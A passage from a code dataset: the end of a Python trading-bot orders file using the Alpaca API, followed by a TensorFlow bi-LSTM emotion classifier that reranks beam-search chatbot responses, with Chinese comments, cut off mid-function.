order\n else:\n pass\n\n def get_order_by_id(self):\n # Submit a market order and assign it a Client Order ID.\n self.api.submit_order(\n symbol='AAPL',\n qty=1,\n side='buy',\n type='market',\n time_in_force='gtc',\n client_order_id='my_first_order'\n )\n\n # Get our order using its Client Order ID.\n my_order = self.api.get_order_by_client_order_id('my_first_order')\n print('Got order #{}'.format(my_order.id))\n \n def portfolio_history_error(self, func):\n def wrapper(*a,**kw):\n try:\n container = func(*a,**kw)\n except tradeapi.rest.APIError as err:\n print(err)\n container = None\n return container\n return wrapper\n\n def close_orders(self,order_id):\n self.api.cancel_order(order_id=order_id)","repo_name":"kesler20/trading_bot","sub_path":"orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":6370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30436130741","text":"import os\r\nimport sys\r\nimport random\r\nimport argparse\r\n\r\nimport tensorflow.compat.v1 as tf\r\n\r\nfrom src.configuration import ChatConfig\r\n\r\ntf.disable_v2_behavior()\r\nimport numpy as np\r\n\r\nfrom src.utils import matrix_initializer, truncated_normal_initializer_variable, zero_initializer_variable\r\nfrom data_utils.prepare_dialogue_data import get_word_count, construct_word_dict, read_emotion_words, construct_vocab, \\\r\n get_word_list, read_word_embeddings\r\n\r\n__author__ = \"Jocelyn\"\r\n\r\n# emotion_dict = {\"anger\": 0, \"disgust\": 1, \"happiness\": 2, \"like\": 3, \"sadness\": 4, \"neutral\": 5}\r\nemotion_dict = {\"anger\": 0, \"disgust\": 1, \"fear\": 2, \"joy\": 3, \"neutral\": 4, \"sadness\": 5, \"surprise\": 6}\r\nid2emotion = {idx: emotion for emotion, idx in emotion_dict.items()}\r\nFLAGS = None\r\n\r\n\r\nclass LstmClassifier(object):\r\n def __init__(self, word_embeddings, words2idx, embedding_size, hidden_size, emotion_class, batch_size,\r\n max_len, use_lstm, session, keep_prob=2.0, learning_rate=0.1, lr_decay=0.5, name=\"lstm_classifier\"):\r\n self.embedding_size = embedding_size\r\n self.hidden_size = hidden_size\r\n self.emotion_class = emotion_class\r\n self.batch_size = batch_size\r\n self.max_len = max_len\r\n self.use_lstm = use_lstm\r\n self.sess = session\r\n self.keep_prob = keep_prob\r\n self.learning_rate_decay_factor = lr_decay\r\n self.name = name\r\n\r\n # word embeddings\r\n self.words2idx = words2idx\r\n self.idx2words = {idx: word for word, idx in self.words2idx.items()}\r\n print(\"word embeddings size here\")\r\n # print(np.shape(word_embeddings))\r\n self.embeddings = matrix_initializer(w=word_embeddings, name=self.name + \"_word_embeddings\")\r\n self.vocab_size = len(words2idx)\r\n\r\n # softmax\r\n self.sfx_w = truncated_normal_initializer_variable(width=hidden_size,\r\n shape=[2 * self.hidden_size, self.emotion_class],\r\n name=self.name+\"_softmax_w\")\r\n self.sfx_b = zero_initializer_variable(shape=[self.emotion_class], name=self.name+\"_softmax_b\")\r\n\r\n # placeholder\r\n self.input_x = tf.placeholder(shape=[self.batch_size, self.max_len], dtype=tf.int32, name=self.name+\"_input_x\")\r\n self.input_y = tf.placeholder(shape=[self.batch_size], dtype=tf.int32, name=self.name+\"_input_y\")\r\n self.input_len = tf.placeholder(shape=[self.batch_size], dtype=tf.int32, name=self.name+\"_input_len\")\r\n\r\n self.input_x_beam = tf.placeholder(shape=[self.batch_size,20, self.max_len], dtype=tf.int32,\r\n name=self.name + \"_input_x_beam\")\r\n self.input_len_beam = tf.placeholder(shape=[self.batch_size,20], dtype=tf.int32, name=self.name + \"_input_len_beam\")\r\n self.input_emo= tf.placeholder(shape=[self.batch_size,20],dtype=tf.int32, name=self.name+\"_input_emo\")\r\n\r\n\r\n self.forward_cell = self.rnn_cell()\r\n self.backward_cell = self.rnn_cell()\r\n\r\n # loss\r\n self.loss = self.compute_loss()\r\n self.pred_scores = self.predict_scores()\r\n self.pred_labels = tf.argmax(self.pred_scores, axis=1)\r\n self.beam_pred_labels= self.beam_fetch()\r\n\r\n tf.summary.scalar(\"loss\", self.loss)\r\n\r\n self.global_step = tf.Variable(0, name=self.name + \"_global_step\", trainable=False)\r\n self.lr = tf.Variable(learning_rate, dtype=tf.float32,name=self.name + \"_lr\",trainable=False)\r\n self.train = self.optimize()\r\n\r\n self.sess.run(tf.global_variables_initializer())\r\n\r\n # self.variables_dict={'lstm_classifier_global_step':self.global_step,'lstm_classifier_softmax_b':self.sfx_b,'lstm_classifier_softmax_w':self.sfx_w,'lstm_classifier_word_embeddings':self.embeddings}\r\n self.saver = tf.train.Saver()\r\n\r\n def basic_rnn_cell(self):\r\n if self.use_lstm:\r\n return tf.nn.rnn_cell.BasicLSTMCell(self.hidden_size, forget_bias=0.0, state_is_tuple=True,\r\n reuse=tf.get_variable_scope().reuse)\r\n else:\r\n return tf.nn.rnn_cell.GRUCell(self.hidden_size, reuse=tf.get_variable_scope().reuse)\r\n\r\n def rnn_cell(self):\r\n single_cell = self.basic_rnn_cell\r\n if self.keep_prob < 1.0:\r\n def single_cell():\r\n return tf.nn.rnn_cell.DropoutWrapper(single_cell, output_keep_prob=self.keep_prob)\r\n cell = single_cell()\r\n # cell = tf.nn.rnn_cell.MultiRNNCell([single_cell() for _ in range(self.num_layers)], state_is_tuple=True)\r\n return cell\r\n\r\n def lstm_process(self):\r\n input_embeddings = tf.nn.embedding_lookup(self.embeddings, self.input_x) # [batch, max_time, embedding size]\r\n\r\n initiate_state_forward = self.forward_cell.zero_state(self.batch_size, dtype=tf.float32)\r\n initiate_state_backward = self.backward_cell.zero_state(self.batch_size, dtype=tf.float32)\r\n outputs, states = tf.nn.bidirectional_dynamic_rnn(self.forward_cell, self.backward_cell, input_embeddings,\r\n sequence_length=self.input_len,\r\n initial_state_fw=initiate_state_forward,\r\n initial_state_bw=initiate_state_backward,\r\n dtype=tf.float32)\r\n output_fw_state, output_bw_state = states\r\n final_states = tf.concat([output_fw_state, output_bw_state], axis=-1) # [2, batch, 2 * hidden]\r\n split_states_outputs = tf.split(final_states, num_or_size_splits=2, axis=0)\r\n final_states = tf.reshape(split_states_outputs[1], [self.batch_size, 2 * self.hidden_size])\r\n \"\"\"\r\n outputs, states = tf.nn.dynamic_rnn(self.forward_cell, input_embeddings, sequence_length=self.input_len,\r\n initial_state=initiate_state_forward, dtype=tf.float32)\r\n split_states_outputs = tf.split(states, num_or_size_splits=2, axis=0)\r\n final_states = tf.reshape(split_states_outputs[1], [self.batch_size, self.hidden_size])\r\n \"\"\"\r\n return final_states\r\n\r\n def lstm_process_beam(self):\r\n input_x_re=[]\r\n final_states_re=[]\r\n # 每个beam单独处理\r\n for i in range(20):\r\n input_x_inn = []\r\n input_len_inn=[]\r\n for j in range(self.batch_size):\r\n # input_x_inn形状是[batch_size,max_len]\r\n # input_len_beam形状就是[batch_size]\r\n input_x_inn.append(self.input_x_beam[j][i])\r\n input_len_inn.append(self.input_len_beam[j][i])\r\n # input_x_re形状就成了[beam,batch_size,max_len]\r\n print(\"input_len_beam here:\")\r\n print(len(input_len_inn))\r\n input_x_re.append(input_x_inn)\r\n\r\n input_embeddings = tf.nn.embedding_lookup(self.embeddings,input_x_inn) # [batch, max_time, embedding size]\r\n\r\n initiate_state_forward = self.forward_cell.zero_state(self.batch_size, dtype=tf.float32)\r\n initiate_state_backward = self.backward_cell.zero_state(self.batch_size, dtype=tf.float32)\r\n outputs, states = tf.nn.bidirectional_dynamic_rnn(self.forward_cell, self.backward_cell, input_embeddings,\r\n sequence_length=input_len_inn,\r\n initial_state_fw=initiate_state_forward,\r\n initial_state_bw=initiate_state_backward,\r\n dtype=tf.float32)\r\n output_fw_state, output_bw_state = states\r\n final_states = tf.concat([output_fw_state, output_bw_state], axis=-1) # [2, batch, 2 * hidden]\r\n split_states_outputs = tf.split(final_states, num_or_size_splits=2, axis=0)\r\n final_states = tf.reshape(split_states_outputs[1], [self.batch_size, 2 * self.hidden_size])\r\n final_states_re.append(final_states)\r\n return final_states_re\r\n\r\n\r\n def compute_loss(self):\r\n final_states = self.lstm_process()\r\n logits = tf.matmul(final_states, self.sfx_w) + self.sfx_b\r\n entropy_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self.input_y, logits=logits)\r\n loss = tf.reduce_sum(entropy_loss) / self.batch_size\r\n return loss\r\n\r\n def predict_scores(self):\r\n final_states = self.lstm_process()\r\n logits = tf.matmul(final_states, self.sfx_w) + self.sfx_b\r\n scores = tf.nn.softmax(logits, dim=-1)\r\n return scores\r\n\r\n def beam_fetch(self):\r\n final_states=self.lstm_process_beam()\r\n scores_re=[]\r\n score_res_gro=[]\r\n for i in range(20):\r\n logits=tf.matmul(final_states[i],self.sfx_w)+self.sfx_b\r\n scores=tf.nn.softmax(logits,dim=-1)\r\n scores_re.append(scores)\r\n # score_re的形状:[beam,batch_size,total-7]\r\n for j in range(self.batch_size):\r\n score_res_col=[]\r\n for i in range(20):\r\n emo_index=self.input_emo[j][i]\r\n emo_tar=scores_re[i][j][emo_index]\r\n score_res_col.append(emo_tar)\r\n print('length of score_res_col')\r\n print(len(score_res_col))\r\n score_res_gro.append(score_res_col)\r\n\r\n\r\n return score_res_gro\r\n\r\n\r\n\r\n def optimize(self):\r\n optimizer = tf.train.GradientDescentOptimizer(self.lr)\r\n trainer = optimizer.minimize(self.loss)\r\n return trainer\r\n\r\n def train_step(self, this_input_x, this_input_y, this_input_len):\r\n output_feed = [self.train, self.loss]\r\n input_feed = {self.input_x: this_input_x,\r\n self.input_y: this_input_y,\r\n self.input_len: this_input_len}\r\n _, loss = self.sess.run(output_feed, input_feed)\r\n return loss\r\n\r\n def predict_step(self, this_input_x, this_input_len):\r\n output_feed = [self.pred_labels]\r\n input_feed = {self.input_x: this_input_x,\r\n self.input_len: this_input_len}\r\n results = self.sess.run(output_feed, input_feed)\r\n return results[0]\r\n\r\n def beam_predict_step(self, this_input_x, this_input_len,this_input_emo):\r\n output_feed = [self.beam_pred_labels]\r\n input_feed = {self.input_x_beam: this_input_x,\r\n self.input_len_beam: this_input_len,\r\n self.input_emo:this_input_emo\r\n }\r\n results = self.sess.run(output_feed, input_feed)\r\n return results[0]\r\n\r\n def get_train_batch(self, input_responses, input_labels, input_lengths, index):\r\n this_input_x = input_responses[index * self.batch_size: (index + 1) * self.batch_size]\r\n this_input_y = input_labels[index * self.batch_size: (index + 1) * self.batch_size]\r\n this_input_len = input_lengths[index * self.batch_size: (index + 1) * self.batch_size]\r\n return this_input_x, this_input_y, this_input_len\r\n\r\n def get_pred_batch(self, input_responses, input_lengths, index):\r\n this_input_x = input_responses[index * self.batch_size: (index + 1) * self.batch_size]\r\n this_input_len = input_lengths[index * self.batch_size: (index + 1) * self.batch_size]\r\n return this_input_x, this_input_len\r\n\r\n# 是一个将回答的句子分成单词的函数\r\ndef read_emotional_response_label_file(train_res_file, train_label_file, max_len=30):\r\n f1 = open(train_res_file, \"r\", encoding=\"utf-8\")\r\n f2 = open(train_label_file, \"r\", encoding=\"utf-8\")\r\n res_lines = f1.readlines()\r\n label_lines = f2.readlines()\r\n\r\n\r\n train_responses = []\r\n train_labels = []\r\n train_lens = []\r\n for res_line, label_line in zip(res_lines, label_lines):\r\n # 去掉label首尾的空格\r\n label = label_line.strip()\r\n\r\n if label not in emotion_dict.keys():\r\n continue\r\n words = res_line.strip().split()\r\n print(words)\r\n # split()函数是用来分割句子的,用空格和/n来切分,其实就是把句子分成一个个单词\r\n if len(words) > max_len:\r\n # 如果超过了,就直接砍掉后面多余的\r\n words = words[: max_len]\r\n train_responses.append(words)\r\n # 在response后面把words拼上去,其实也就是把response分成单词放进train_responses里面\r\n train_labels.append(emotion_dict[label])\r\n # 把情绪的也放进去\r\n train_lens.append(len(words))\r\n # 把回答的长度也放进去\r\n return train_responses, train_labels, train_lens\r\n\r\n# 是一个将回答的句子分成单词的函数\r\ndef read_test_emotional_response_label_file(train_res_file, max_len=30):\r\n f1 = open(train_res_file, \"r\", encoding=\"utf-8\")\r\n res_lines = f1.readlines()\r\n print(\"lines from file\")\r\n print(len(res_lines))\r\n train_responses = []\r\n train_lens = []\r\n for res_line in res_lines:\r\n words = res_line.strip().split()\r\n # print(words)\r\n # split()函数是用来分割句子的,用空格和/n来切分,其实就是把句子分成一个个单词\r\n if len(words) > max_len:\r\n # 如果超过了,就直接砍掉后面多余的\r\n words = words[: max_len]\r\n train_responses.append(words)\r\n # 把情绪的也放进去\r\n train_lens.append(len(words))\r\n # 把回答的长度也放进去\r\n return train_responses, train_lens\r\n\r\ndef read_test_data(filename, max_len):\r\n f = open(filename, \"r\", encoding=\"utf-8\")\r\n lines = f.readlines()\r\n\r\n responses = []\r\n train_lens = []\r\n for line in lines:\r\n words = line.strip().split()\r\n if len(words) > max_len:\r\n words = words[: max_len]\r\n responses.append(words)\r\n train_lens.append(len(words))\r\n return responses, train_lens\r\n\r\n# 补齐responses的函数(补齐成max_len)\r\ndef response_to_indexs(train_responses, word_dict, word_unk_id, max_len):\r\n new_responses = []\r\n for response in train_responses:\r\n # 在通用词词典里找到句子中的单词,如果没有就用unk\r\n new_response = [word_dict[word] if word in word_dict else word_unk_id for word in response]\r\n if len(new_response) < max_len:\r\n # 如果长度不够就用unk补齐\r\n remain = max_len - len(new_response)\r\n for i in range(remain):\r\n new_response.append(word_unk_id)\r\n new_responses.append(new_response)\r\n return new_responses\r\n\r\n# 处理不能被batchsize整除的样本集\r\ndef align_train_batch_size(train_responses, emotion_labels, response_lens, batch_size):\r\n length = len(train_responses)\r\n if length % batch_size != 0: # 如果不能被完整分批次\r\n remain = batch_size - length % batch_size # 是去掉多余的后剩下有多少\r\n total_data = [[res, label, length] for res, label, length in\r\n zip(train_responses, emotion_labels, response_lens)]\r\n sequence = range(length)\r\n for _ in range(remain):\r\n index = random.choice(sequence) # 会随机选中一个response的index\r\n total_data.append(total_data[index])\r\n train_responses = [data[0] for data in total_data]\r\n emotion_labels = [data[1] for data in total_data]\r\n response_lens = [data[2] for data in total_data]\r\n return train_responses, emotion_labels, response_lens\r\n\r\ndef align_test_batch_size(test_response_without,response_lens, batch_size):\r\n length = len(test_response_without)\r\n if length % batch_size != 0: # 如果不能被完整分批次\r\n remain = batch_size - length % batch_size # 是去掉多余的后剩下有多少\r\n total_data = [[res, length] for res, length in\r\n zip(test_response_without, response_lens)]\r\n sequence = range(length)\r\n for _ in range(remain):\r\n index = random.choice(sequence) # 会随机选中一个response的index\r\n total_data.append(total_data[index])\r\n test_response_without = [data[0] for data in total_data]\r\n response_lens = [data[1] for data in total_data]\r\n return test_response_without, response_lens\r\n\r\n\r\n\r\ndef shuffle_train_data(train_responses, emotion_labels, response_lens):\r\n total_data = [[res, label, length] for res, label, length in\r\n zip(train_responses, emotion_labels, response_lens)]\r\n # 随机排序\r\n random.shuffle(total_data)\r\n train_responses = [data[0] for data in total_data]\r\n emotion_labels = [data[1] for data in total_data]\r\n response_lens = [data[2] for data in total_data]\r\n return train_responses, emotion_labels, response_lens\r\n\r\n\r\ndef write_labels(file_name, labels):\r\n f = open(file_name, \"w\", encoding=\"utf-8\")\r\n for label in labels:\r\n f.write(id2emotion[label])\r\n f.write(\"\\n\")\r\n f.close()\r\n\r\n\r\ndef split_train_valid_data(train_responses, train_labels, train_lens):\r\n # 回答的总长度,即有多少个回答\r\n total_length = len(train_responses)\r\n train_len = int(total_length * 0.9)\r\n # 取总长度的0.1\r\n valid_len = total_length - train_len\r\n # 随意取total_length里的一部分作为valid_len范围(验证集)里的有效长度\r\n sequence = random.sample(range(total_length), valid_len)\r\n training_res, training_labels, training_lens, valid_res, valid_labels, valid_lens = [], [], [], [], [], []\r\n for i in range(total_length):\r\n # 如果i在valid_len里面\r\n if i in sequence:\r\n valid_res.append(train_responses[i]) # 把对应的回答放进去\r\n valid_labels.append(train_labels[i]) # 把标签放进去\r\n valid_lens.append(train_lens[i]) # 把这个回答的长度放进去(选中的这个回答的长度)\r\n else: # 如果不是,就不要放进valid数组\r\n training_res.append(train_responses[i])\r\n training_labels.append(train_labels[i])\r\n training_lens.append(train_lens[i])\r\n return training_res, training_labels, training_lens, valid_res, valid_labels, valid_lens\r\n\r\n\r\ndef compute_accuracy(pred_labels, true_labels):\r\n total_len = len(pred_labels)\r\n num = 0\r\n for pred, true_label in zip(pred_labels, true_labels):\r\n if pred == true_label:\r\n num += 1\r\n acc = float(num) / total_len\r\n return acc\r\n\r\n# 读embeddings文件并且转成embedding的函数\r\ndef read_total_embeddings(embedding_file, vocab_size):\r\n embeddings = list()\r\n # 构造一个词典\r\n word2id = dict()\r\n id2word = dict()\r\n word_list=[]\r\n f = open(embedding_file, \"r\", encoding=\"utf-8\")\r\n for line in f.readlines()[: vocab_size]:\r\n # strip() 方法用于移除字符串头尾指定的字符(默认为空格或换行符)或字符序列。\r\n # split()函数是用来分割句子的,用空格和/n来切分,其实就是把句子分成一个个单词\r\n lemmas = line.strip().split()\r\n # 说明这个文件每一行的第一个单词都是这个embedding代表的单词\r\n word = lemmas[0].strip()\r\n embedding = list()\r\n for lemma in lemmas[1:]:\r\n # 把str模式的float转成真正的float\r\n embedding.append(float(lemma.strip()))\r\n # print(\"embedding:\" + str(len(embedding)))\r\n index = len(word2id)\r\n # 制作单词到index的词典\r\n word2id[word] = index\r\n # 制作index到单词的词典\r\n id2word[index] = word\r\n embeddings.append(embedding)\r\n word_list.append(word)\r\n\r\n return embeddings, word2id, id2word,word_list\r\n\r\ndef index_test_data(test_data, id2words):\r\n \"\"\"\r\n write post and most correct response data\r\n :param test_data:\r\n :param write_file:\r\n :param id2words:\r\n :param test_emotion_labels:\r\n :return:\r\n \"\"\"\r\n # f = open(write_file, \"w\", encoding=\"utf-8\")\r\n generate_data=[]\r\n for data in test_data:\r\n generate_data_b=[]\r\n for data_b in data:\r\n words = [id2words[index] if index in range(len(id2words)) else 0 for index in data_b]\r\n\r\n sentence = \" \".join(str(word) for word in words)\r\n final_sentence = sentence\r\n generate_data_b.append(final_sentence)\r\n generate_data.append(generate_data_b)\r\n return generate_data\r\n\r\ndef change_file_format(origin):\r\n # [origin]的形状是:[batch_size,beam_size,max_len]\r\n start_symbol = \"\"\r\n end_symbol = \"\"\r\n new=[]\r\n\r\n # f1 = open(file1, \"r\", encoding=\"utf-8\")\r\n # f2 = open(file2, \"w\", encoding=\"utf-8\")\r\n for line in origin:\r\n new_b=[]\r\n for line_b in line:\r\n line_str=' '.join(line_b)\r\n words = line_str.strip().split()\r\n words = words[1:]\r\n if start_symbol in words:\r\n start_index = words.index(start_symbol) + 1\r\n else:\r\n start_index = 0\r\n if end_symbol in words:\r\n end_index = words.index(end_symbol)\r\n else:\r\n end_index = len(words)\r\n selected_words = words[start_index: end_index]\r\n sentence = \" \".join(selected_words)\r\n new_b.append(sentence)\r\n new.append(new_b)\r\n return new\r\n\r\ndef add_emo_beam(beam_size,emos_data):\r\n # emos_data的形状是:[batch_size,1]\r\n new_emos=[]\r\n for emo in emos_data:\r\n new_emos_in = []\r\n for i in range(beam_size):\r\n new_emos_in.append(emo)\r\n new_emos.append(new_emos_in)\r\n # new_emos的形状就变成了[batch_size,beam_size]\r\n # 并且同一个beam里,情感都是一样的\r\n return new_emos\r\n # for i in range(beam_size):\r\n # new_emos_in = []\r\n # for emo in emos_data:\r\n # new_emos_in.append(emo)\r\n # new_emos.append(new_emos_in)\r\n # # new_emos的形状就变成了[batch_size,beam_size]\r\n # # 并且同一个beam里,情感都是一样的\r\n # return new_emos\r\n\r\n\r\ndef read_beam_test(test_res,test_emo,max_len=30):\r\n # test_res:[batch_size,beam,max_len]\r\n # test_emo:[batch_size,beam]\r\n test_responses=[]\r\n test_lens=[]\r\n test_emos=[]\r\n for res_b,emo_b in zip(test_res,test_emo):\r\n test_responses_b = []\r\n test_lens_b = []\r\n test_emos_b = []\r\n for res,emo in zip(res_b,emo_b):\r\n words= res.strip().split()\r\n emo_s=emo\r\n if emo_s not in range(7):\r\n continue\r\n if len(words) > max_len:\r\n # 如果超过了,就直接砍掉后面多余的\r\n words = words[: max_len]\r\n test_responses_b.append(words)\r\n test_lens_b.append(len(words))\r\n test_emos_b.append(emo_s)\r\n test_responses.append(test_responses_b)\r\n test_lens.append(test_lens_b)\r\n test_emos.append(test_emos_b)\r\n return test_responses,test_lens,test_emos\r\n\r\ndef response_to_indexs_b(train_responses, word_dict, word_unk_id, max_len):\r\n new_responses = []\r\n for response_o in train_responses:\r\n new_responses_b=[]\r\n for response in response_o:\r\n # 在通用词词典里找到句子中的单词,如果没有就用unk\r\n new_response = [word_dict[word] if word in word_dict else word_unk_id for word in response]\r\n if len(new_response) < max_len:\r\n # 如果长度不够就用unk补齐\r\n remain = max_len - len(new_response)\r\n for i in range(remain):\r\n new_response.append(word_unk_id)\r\n new_responses_b.append(new_response)\r\n new_responses.append(new_responses_b)\r\n return new_responses\r\n\r\ndef train_b(train_response_file, train_label_file, test_res_file, test_label_file, max_len, word_count_file, vocab_size,\r\n embedding_file, embedding_size, batch_size, num_epoch, hidden_size, emotion_class, pred_label_file, session,generate_words, scores,this_emotion_labels,lstm_emotion_machine):\r\n print(\"read word and embeddings\\n\")\r\n model_path = os.path.dirname(os.path.dirname(os.path.abspath(\"lstm_classifier.py\")))\r\n data_dir = os.path.join(model_path, \"data\")\r\n embeddings, total_word_dict, id2word,word_l=read_total_embeddings(embedding_file, vocab_size)\r\n word_unk_id = total_word_dict['']\r\n\r\n print(\"reading training data\\n\")\r\n # 将回答的句子分成单词\r\n train_responses, train_labels, train_lens = read_emotional_response_label_file(train_response_file,\r\n train_label_file,\r\n max_len)\r\n # 补齐responses(补齐成max_len)\r\n train_responses = response_to_indexs(train_responses, total_word_dict, word_unk_id, max_len)\r\n # train_responses, train_labels什么的都会更新,会把valid的放出去,也就是随机分出验证集\r\n train_responses, train_labels, train_lens, valid_res, valid_labels, valid_lens = \\\r\n split_train_valid_data(train_responses, train_labels, train_lens)\r\n # 处理不能被batch_size整除的train样本集,随机挑一些直接砍掉\r\n train_responses, train_labels, train_lens = align_train_batch_size(train_responses, train_labels, train_lens,\r\n batch_size)\r\n # 处理不能被batch_size整除的valid样本集,随机挑一些直接砍掉\r\n valid_res, valid_labels, valid_lens = align_train_batch_size(valid_res, valid_labels, valid_lens, batch_size)\r\n\r\n # 读测试数据,和训练集一样的操作\r\n print(\"Read prediction data!\\n\")\r\n test_responses,test_lens = read_test_emotional_response_label_file(test_res_file,max_len)\r\n print(len(test_responses))\r\n\r\n test_responses = response_to_indexs(test_responses, total_word_dict, word_unk_id, max_len)\r\n\r\n test_length = len(test_responses)\r\n test_responses, test_lens = align_test_batch_size(test_responses,test_lens, batch_size)\r\n\r\n # 定义bi-lstm的模型\r\n print(\"Define model!\\n\")\r\n lstm_emotion_machine = LstmClassifier(embeddings, word_dict, embedding_size, hidden_size, emotion_class, batch_size,max_len, True, session, learning_rate=0.1)\r\n # 开始训练\r\n # 开始训练\r\n print(\"training\\n\")\r\n # 一共有多少批训练集\r\n\r\n train_batch = int(len(train_responses) / batch_size)\r\n # 一共有多少批验证集\r\n valid_batch = int(len(valid_res) / batch_size)\r\n valid_accs = []\r\n best_valid_acc = -1.0\r\n ckpt_path = os.path.join(os.path.join(model_path, \"data_utils/check_path_lstm\"), \"check_path_lstm\")\r\n # 开始训练\r\n for i in range(num_epoch):\r\n print(\"Now train epoch %d!\\n\" % (i + 1))\r\n # 首先随机排序,即打乱顺序\r\n train_responses, train_labels, train_lens = shuffle_train_data(train_responses, train_labels, train_lens)\r\n\r\n for j in range(train_batch):\r\n # 处理输入,处理成能直接喂进去的形式\r\n this_res, this_label, this_len = lstm_emotion_machine.get_train_batch(train_responses, train_labels,\r\n train_lens, j)\r\n # 计算损失\r\n loss = lstm_emotion_machine.train_step(this_res, this_label, this_len)\r\n print(\"epoch=%d, batch=%d, loss=%f\\n\" % ((i + 1), (j + 1), loss))\r\n # 验证集验证开始\r\n labels = []\r\n for k in range(valid_batch):\r\n this_res, this_label, this_len = lstm_emotion_machine.get_train_batch(valid_res, valid_labels,\r\n valid_lens, k)\r\n # 输出预测出来的labels,可能有多个?\r\n this_labels = lstm_emotion_machine.predict_step(this_res, this_len)\r\n labels.extend(this_labels)\r\n # 计算准确度\r\n accuracy = compute_accuracy(labels, valid_labels)\r\n print(\"epoch=%d, accuracy=%f\\n\" % ((i + 1), accuracy))\r\n valid_accs.append(accuracy)\r\n # 保存这次的结果\r\n if best_valid_acc < accuracy:\r\n best_valid_acc = accuracy\r\n lstm_emotion_machine.saver.save(lstm_emotion_machine.sess, ckpt_path, global_step=(i + 1) * train_batch)\r\n #lstm_emotion_machine.save_weights(FLAGS.checkpoint_path)\r\n # 取最好的和平均的准确率\r\n best_acc = np.max(valid_accs)\r\n ave_acc = np.average(valid_accs)\r\n print(\"best acc=%f, average acc=%f\\n\" % (best_acc, ave_acc))\r\n\r\n\r\n # last_ckpt = lstm_emotion_machine.saver.last_checkpoints\r\n # print(\"test here\")\r\n # print(last_ckpt)\r\n # restore_path = lstm_emotion_machine.saver.last_checkpoints[0]\r\n\r\n\r\n checkpoint_path = os.path.join(os.path.join(model_path, \"data_utils/check_path_lstm\"), \"check_path_lstm-11728\")\r\n\r\n\r\n # lstm_emotion_machine.saver.restore(lstm_emotion_machine.sess, checkpoint_path)\r\n\r\n # 移动过来的\r\n generate_words=index_test_data(generate_words,id2word)\r\n # 去掉start和end_id\r\n generate_words=change_file_format(generate_words)\r\n # 把emo也变成beam个重复的数据形状\r\n this_emotion_labels=add_emo_beam(20,this_emotion_labels)\r\n\r\n test_responses,test_lens,this_emotion_labels= read_beam_test(generate_words,this_emotion_labels,FLAGS.max_len)\r\n test_responses = response_to_indexs_b(test_responses, total_word_dict, word_unk_id, FLAGS.max_len)\r\n\r\n total_labels = []\r\n # for k in range(pred_batches):\r\n # 处理输入\r\n # this_res, this_len = lstm_emotion_machine.get_pred_batch(test_responses, chat_config.max_len, k)\r\n # 输出预测的labels,形状是[batch_size,beam,1]\r\n # tf.reset_default_graph()\r\n this_labels_scores = lstm_emotion_machine.beam_predict_step(test_responses, test_lens, this_emotion_labels)\r\n scores_mul = []\r\n max_col = []\r\n for ge_score, emo_score in zip(scores, this_labels_scores):\r\n scores_mul_b = []\r\n for ge_score_b, emo_score_b in zip(ge_score, emo_score):\r\n scores_mul_b.append(ge_score_b * emo_score_b)\r\n scores_mul.append(scores_mul_b)\r\n # max_col的形状是[batch_size,1],类型是tensor\r\n for scores in scores_mul:\r\n max_index = scores.index(max(scores))\r\n max_col.append(max_index)\r\n for i in range(batch_size):\r\n print(max_col[i])\r\n\r\n total_labels.append(generate_words[i][max_col[i]])\r\n return total_labels\r\n\r\n '''\r\n pred_batches = int(len(test_responses) / batch_size)\r\n total_labels = []\r\n for k in range(pred_batches):\r\n # 处理输入\r\n this_res, this_len = lstm_emotion_machine.get_pred_batch(test_responses, test_lens, k)\r\n # 输出预测的labels\r\n this_labels = lstm_emotion_machine.predict_step(this_res, this_len)\r\n total_labels.extend(this_labels)\r\n\r\n print(\"check here length\")\r\n print(len(test_responses))\r\n print(len(total_labels))\r\n write_labels(pred_label_file, total_labels)\r\n\r\n return lstm_emotion_machine\r\n '''\r\n # print(len(total_labels))\r\n\r\n\r\ndef train(config_file,train_response_file, train_label_file, test_res_file, test_label_file, max_len, word_count_file, vocab_size,\r\n embedding_file, embedding_size, batch_size, num_epoch, hidden_size, emotion_class, pred_label_file,pre_train_word_count_file,emotion_words_dir, session):\r\n chat_config = ChatConfig(config_file)\r\n print(\"read word and embeddings\\n\")\r\n total_embeddings, total_word2id, total_id2word,total_word_list,=read_total_embeddings(embedding_file, vocab_size)\r\n pre_word_count = get_word_count(pre_train_word_count_file, chat_config.word_count)\r\n emotion_words_dict = read_emotion_words(emotion_words_dir, pre_word_count)\r\n word_list = construct_vocab(total_word_list, emotion_words_dict, chat_config.generic_word_size,chat_config.emotion_vocab_size, FLAGS.unk)\r\n word_dict = construct_word_dict(word_list, FLAGS.unk, FLAGS.start_symbol, FLAGS.end_symbol)\r\n id2words = {idx: word for word, idx in word_dict.items()}\r\n word_unk_id = word_dict[FLAGS.unk]\r\n word_start_id = word_dict[FLAGS.start_symbol]\r\n word_end_id = word_dict[FLAGS.end_symbol]\r\n final_word_list = get_word_list(id2words)\r\n print(\"Read word embeddings!\\n\")\r\n # 读所有的词向量\r\n embeddings = read_word_embeddings(total_embeddings, total_word2id, final_word_list, chat_config.embedding_size)\r\n\r\n print(\"reading training data\\n\")\r\n # 将回答的句子分成单词\r\n train_responses, train_labels, train_lens = read_emotional_response_label_file(train_response_file,\r\n train_label_file,\r\n max_len)\r\n # 补齐responses(补齐成max_len)\r\n train_responses = response_to_indexs(train_responses, word_dict, word_unk_id, max_len)\r\n # train_responses, train_labels什么的都会更新,会把valid的放出去,也就是随机分出验证集\r\n train_responses, train_labels, train_lens, valid_res, valid_labels, valid_lens = \\\r\n split_train_valid_data(train_responses, train_labels, train_lens)\r\n # 处理不能被batch_size整除的train样本集,随机挑一些直接砍掉\r\n train_responses, train_labels, train_lens = align_train_batch_size(train_responses, train_labels, train_lens,\r\n batch_size)\r\n\r\n # 处理不能被batch_size整除的valid样本集,随机挑一些直接砍掉\r\n valid_res, valid_labels, valid_lens = align_train_batch_size(valid_res, valid_labels, valid_lens, batch_size)\r\n\r\n # 读测试数据,和训练集一样的操作\r\n print(\"Read prediction data!\\n\")\r\n test_responses,test_lens = read_test_emotional_response_label_file(test_res_file,max_len)\r\n print(len(test_responses))\r\n\r\n test_responses = response_to_indexs(test_responses, word_dict, word_unk_id, max_len)\r\n\r\n test_length = len(test_responses)\r\n test_responses, test_lens = align_test_batch_size(test_responses,test_lens, batch_size)\r\n\r\n # 定义bi-lstm的模型\r\n print(\"Define model!\\n\")\r\n lstm_emotion_machine = 